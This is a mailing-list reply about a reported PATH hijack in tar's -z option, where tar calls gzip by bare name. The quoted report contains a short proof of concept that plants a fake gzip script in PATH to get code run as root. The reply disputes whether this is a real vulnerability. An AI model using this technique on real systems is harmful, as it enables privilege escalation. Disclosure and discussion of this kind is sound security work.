[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Path Hijack vulnerability

From: Michał Górny
Subject: Re: Path Hijack vulnerability
Date: Wed, 03 Nov 2021 18:43:48 +0100
User-agent: Evolution 3.42.0

On Wed, 2021-11-03 at 15:21 +0100, Gregorio Giacobbe wrote:
> Hi!
> As per subject, I discovered a Path Hijack vulnerabilty in the tar binary. 
> When using the -z switch for gzip compression/decompression the binary calls 
> “gzip” without absolute path, hence allowing the path Hijack. 
> While this, in a normal scenario can be totally harmless, it can be used as a 
> privileged escalation technique when the tar binary is called as root user.
> Following lines will provide a basic PoC:
> ----
> export PATH=$(pwd):$PATH
> echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip
> chmod +x gzip
> touch file.txt
> tar -zcf backup.tar.gz file.txt
> ls -la /tmp/tarred 
> -rw-r--r-- 1 root root 0 Nov  3 14:05 /tmp/tarred
> ----
> I have not tested switches for other compression/decompression formats, so 
> there is a chance that they can be used as well as gzip.

Do you realize that if you have sufficient access to inject "gzip", you
may inject "tar" as well, right?

Best regards,
Michał Górny

reply via email to

[Prev in Thread] Current Thread [Next in Thread]